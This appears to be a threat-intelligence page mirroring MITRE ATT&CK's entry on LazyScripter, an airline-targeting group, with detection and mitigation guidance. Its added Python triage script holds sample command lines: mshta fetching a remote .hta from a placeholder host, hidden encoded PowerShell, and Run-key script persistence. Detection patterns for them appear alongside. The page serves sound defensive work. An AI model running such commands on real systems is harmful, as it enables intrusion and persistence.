G0140: LazyScripter
LazyScripter is a threat group that has mainly targeted the airline industry since at least 2018, primarily using open-source toolsets.[1]
Analyst context for executives and security teams
LazyScripter matters because MITRE describes it as a group mainly targeting the airline industry and relying primarily on publicly available/open-source toolsets. For leaders, the decision value is not a unique malware signature; it is whether the organization can detect common post-exploitation frameworks, RATs, phishing-driven execution, script abuse, and command-and-control patterns that can blend into normal Windows and web/DNS traffic.
Executive priority
Prioritize this as a resilience and readiness test for aviation or airline-adjacent environments, and as a general control validation case for any enterprise with heavy Windows, email, scripting, and remote administration exposure. Executives should ask whether email security, endpoint telemetry, DNS/web monitoring, PowerShell/script logging, and incident response playbooks can handle commodity tools such as Koadic, QuasarRAT, Remcos, Empire, njRAT, ngrok, and KOCTOPUS without relying only on known indicators.
Technical view
ATT&CK relationships connect LazyScripter to phishing links and attachments, user execution, PowerShell, Windows Command Shell, Visual Basic, JavaScript/JScript, mshta, rundll32, registry run keys/startup folders, command obfuscation, masquerading, DNS and web-service C2, ingress tool transfer, and acquired domains. SOC and IR teams should validate detections across the full chain: suspicious email delivery, user-launched script or document activity, trusted Windows utility abuse, persistence creation, external tunnel/proxy or RAT traffic, and tool download events. Relationship context is strongly Windows-relevant through several tools and techniques, though the group object itself has no explicit platform field.
Likely telemetry
- Email security logs for spearphishing attachments and links
- Endpoint process creation and command-line telemetry for powershell.exe, cmd.exe, mshta.exe, rundll32.exe, Windows Script Host/JScript/VBScript activity, and suspicious child processes
- PowerShell logging where available, including script block/module/transcription-style evidence if enabled locally
- File creation and download telemetry for RATs, loaders, scripts, archives, and transferred tools
- Windows Registry and startup folder monitoring for Run key or startup persistence
Detection direction
- Do not center coverage only on LazyScripter-named indicators; the mapped behavior uses common tools and techniques that may appear in many intrusions or benign administration contexts.
- Tune detections for suspicious combinations: phishing-originated execution followed by script interpreters, mshta/rundll32 proxy execution, PowerShell or cmd spawning network connections, tool transfer, and persistence changes.
- Baseline legitimate administrative use of PowerShell, rundll32, mshta, ngrok or similar tunneling tools, and remote administration utilities to reduce false positives while preserving visibility into abnormal parent-child process chains and destinations.
- Correlate DNS/web anomalies with endpoint execution rather than treating network events in isolation, since DNS and web services are common and noisy.
- Validate that obfuscated command lines and masqueraded filenames are still captured and searchable; weak command-line logging is a major blind spot for this behavior set.
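The detection direction above, carried through as an added example (not Glexia's or MITRE's code): a small triage routine that flags the phishing-parent to script-host chains, mshta/rundll32 execution of remote content, encoded PowerShell and Run-key script persistence mapped to this group, run over constructed Sysmon-style events. Field names, process paths, hostnames and the registry value are assumptions, not observed indicators.

```python
# Added example (not Glexia's or MITRE's code): flag phishing-parent chains, proxy execution,
# encoded PowerShell and Run-key persistence over constructed Sysmon-style events (fields assumed).
import re

# Script interpreters and trusted utilities in the LazyScripter relationship set.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}
# Parents that mark phishing-originated execution (mail client, Office, archivers).
PHISH_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "winrar.exe", "7zfm.exe"}
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run$", re.I)
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)
REMOTE_ARG = re.compile(r"https?://|javascript:|\.hta\b", re.I)
SCRIPT_IN_DATA = re.compile(r"powershell|wscript|cscript|mshta|\.ps1\b|\.vbs\b|\.js\b", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the rule names one event triggers (empty list = no finding)."""
    hits = []
    if ev["type"] == "process":
        child, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        if child in SCRIPT_HOSTS and parent in PHISH_PARENTS:
            hits.append("phish_parent_to_script_host")  # T1204 -> T1059 / T1218
        if child in ("mshta.exe", "rundll32.exe") and REMOTE_ARG.search(cmd):
            hits.append("proxy_exec_remote_content")    # T1218.005 / T1218.011
        if child == "powershell.exe" and ENCODED.search(cmd):
            hits.append("encoded_powershell")           # T1027.010 / T1059.001
    elif ev["type"] == "registry" and RUN_KEY.search(ev["key"]) and SCRIPT_IN_DATA.search(ev["data"]):
        hits.append("run_key_script_persistence")       # T1547.001, script in autorun key
    return hits

def triage(events):
    """Map event id -> triggered rules, keeping only events with findings."""
    return {ev["id"]: h for ev in events if (h := score_event(ev))}

# Constructed sample telemetry; hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Office\OUTLOOK.EXE", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://stage.example.invalid/index.hta"},
    {"id": 2, "type": "process", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},  # routine use, no finding
    {"id": 3, "type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBBAEEA"},
    {"id": 4, "type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"powershell.exe -File C:\Users\Public\update.ps1"},
]

if __name__ == "__main__":
    for eid, rules in triage(SAMPLE_EVENTS).items():
        print(eid, rules)
```

Event 2 shows the baselining point: rundll32 launched by explorer with a local DLL argument produces no finding, while the same binary pulling remote content or spawned from a mail client does.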
Mitigation priorities
- Strengthen phishing defenses and user-reporting workflows for malicious attachments and links, especially where airline or travel-sector business processes create high email dependency.
- Harden script execution paths: constrain unnecessary PowerShell, Windows Script Host, mshta, and rundll32 abuse where operationally feasible, and monitor exceptions.
- Apply least privilege and application control principles to reduce successful execution of unauthorized RATs, loaders, and post-exploitation frameworks.
- Monitor and restrict unauthorized tunneling, proxy, and remote access tools, including legitimate services that can be repurposed for C2 or exfiltration paths.
- Ensure persistence locations such as Registry Run keys and startup folders are monitored and reviewed during IR triage.
Analyst notes and limits
The strongest ATT&CK-supported business relevance is airline-sector targeting and use of publicly available toolsets. The relationship graph provides richer defensive direction than the group description itself: multiple RATs/frameworks, script interpreters, phishing, trusted Windows utility abuse, persistence, and C2 behaviors. This should be used as a coverage and hunt-planning profile rather than as a claim of current activity or customer exposure.
MITRE provides no official detection text, no explicit group-level platforms or tactics, and only one cited public report in the supplied references. Platforms and tactics in this take are inferred only from the supplied related techniques and software, not from the group object itself. Local telemetry, business process context, approved admin tooling, and current threat intelligence are required to determine actual exposure or detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.001 | Malicious Link | LazyScripter has relied upon users clicking on links to malicious files.[1] |
| Enterprise | T1218.005 | Mshta | LazyScripter has used `mshta.exe` to execute Koadic stagers.[1] |
| Enterprise | T1608.001 | Upload Malware | LazyScripter has hosted open-source remote access Trojans used in its operations on GitHub.[1] |
| Enterprise | T1204.002 | Malicious File | LazyScripter has lured users to open malicious email attachments.[1] |
| Enterprise | T1102 | Web Service | LazyScripter has used GitHub to host its payloads to operate spam campaigns.[1] |
| Enterprise | T1059.007 | JavaScript | LazyScripter has used JavaScript in its attacks.[1] |
| Enterprise | T1583.001 | Domains | LazyScripter has used dynamic DNS providers to create legitimate-looking subdomains for C2.[1] |
| Enterprise | T1059.005 | Visual Basic | LazyScripter has used VBScript to execute malicious code.[1] |
| Enterprise | T1071.004 | DNS | LazyScripter has leveraged dynamic DNS providers for C2 communications.[1] |
| Enterprise | T1588.001 | Malware | LazyScripter has used a variety of open-source remote access Trojans for its operations.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | LazyScripter has downloaded additional tools to a compromised host.[1] |
| Enterprise | T1036 | Masquerading | LazyScripter has used several different security software icons to disguise executables.[1] |
| Enterprise | T1566.001 | Spearphishing Attachment | LazyScripter has used spam emails weaponized with archive or document files as its initial infection vector.[1] |
| Enterprise | T1059.001 | PowerShell | LazyScripter has used PowerShell scripts to execute malicious code.[1] |
| Enterprise | T1059.003 | Windows Command Shell | LazyScripter has used batch files to deploy open-source and multi-stage RATs.[1] |
| Enterprise | T1027.010 | Command Obfuscation | LazyScripter has leveraged the BatchEncryption tool to perform advanced batch script obfuscation and encoding techniques.[1] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | LazyScripter has achieved persistence by writing a PowerShell script to the autorun registry key.[1] |
| Enterprise | T1218.011 | Rundll32 | LazyScripter has used `rundll32.exe` to execute Koadic stagers.[1] |
| Enterprise | T1566.002 | Spearphishing Link | LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.[1] |
| Enterprise | T1583.006 | Web Services | LazyScripter has established GitHub accounts to host its toolsets.[1] |
Groups, software, and campaigns
S0332: Remcos
S0262: QuasarRAT
S0385: njRAT
S0508: ngrok
S0363: Empire
Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]
S0250: Koadic
S0669: KOCTOPUS
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | 1c01e90978e2… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] MalwareBytes LazyScripter Feb 2021: Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
- [2] LazyScripter (Citation: MalwareBytes LazyScripter Feb 2021)
- [3] mitre-attack: G0140
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.